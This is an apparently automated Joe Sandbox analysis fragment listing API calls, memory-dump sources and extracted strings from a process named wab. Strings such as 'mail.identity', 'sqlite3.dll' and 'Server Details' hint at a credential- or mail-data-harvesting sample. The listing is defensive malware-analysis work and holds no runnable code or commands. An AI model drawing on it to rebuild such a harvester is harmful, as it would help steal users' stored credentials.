                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                                                  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                                                                                                                • strlen.MSVCRT ref: 0040B60B
                                                                                                                • atoi.MSVCRT ref: 0040B619
                                                                                                                • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4107816708-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                • String ID:
                                                                                                                • API String ID: 1886415126-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strlen
                                                                                                                • String ID: >$>$>
                                                                                                                • API String ID: 39653677-3911187716
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: @
                                                                                                                • API String ID: 3510742995-2766056989
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • strlen.MSVCRT ref: 0040797A
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040799A
                                                                                                                  • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                  • Part of subcall function 00406F30: memcpy.MSVCRT ref: 00406F64
                                                                                                                  • Part of subcall function 00406F30: ??3@YAXPAX@Z.MSVCRT ref: 00406F6D
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004079BD
                                                                                                                • memcpy.MSVCRT ref: 004079DD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1171893557-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strcmpi
                                                                                                                • String ID: C@$mail.identity
                                                                                                                • API String ID: 1439213657-721921413
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00406640
                                                                                                                  • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                                                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                                                                                                                • memcmp.MSVCRT ref: 00406672
                                                                                                                • memcpy.MSVCRT ref: 00406695
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset$memcmp
                                                                                                                • String ID: Ul@
                                                                                                                • API String ID: 270934217-715280498
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                                                                                • sprintf.MSVCRT ref: 0040B929
                                                                                                                • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                • sprintf.MSVCRT ref: 0040B953
                                                                                                                • _mbscat.MSVCRT ref: 0040B966
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 203655857-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040ADE8
                                                                                                                • memset.MSVCRT ref: 0040ADFE
                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT ref: 0040A4EB
                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                • sprintf.MSVCRT ref: 0040AE28
                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                • String ID: </%s>
                                                                                                                • API String ID: 3699762281-259020660
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                Strings
                                                                                                                • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                • String ID: recovered %d pages from %s
                                                                                                                • API String ID: 985450955-1623757624
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _ultoasprintf
                                                                                                                • String ID: %s %s %s
                                                                                                                • API String ID: 432394123-3850900253
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409919
                                                                                                                • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendmemset
                                                                                                                • String ID: N\@
                                                                                                                • API String ID: 568519121-3851889168
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                • sprintf.MSVCRT ref: 0040909B
                                                                                                                  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                • String ID: menu_%d
                                                                                                                • API String ID: 1129539653-2417748251
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _msizerealloc
                                                                                                                • String ID: failed memory resize %u to %u bytes
                                                                                                                • API String ID: 2713192863-2134078882
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                                • strrchr.MSVCRT ref: 00409808
                                                                                                                • _mbscat.MSVCRT ref: 0040981D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleName_mbscatstrrchr
                                                                                                                • String ID: _lng.ini
                                                                                                                • API String ID: 3334749609-1948609170
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • _mbscpy.MSVCRT ref: 004070EB
                                                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                • _mbscat.MSVCRT ref: 004070FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscat$_mbscpystrlen
                                                                                                                • String ID: sqlite3.dll
                                                                                                                • API String ID: 1983510840-1155512374
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileString
                                                                                                                • String ID: A4@$Server Details
                                                                                                                • API String ID: 1096422788-4071850762
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 438689982-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3110682361-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3510742995-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1860491036-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%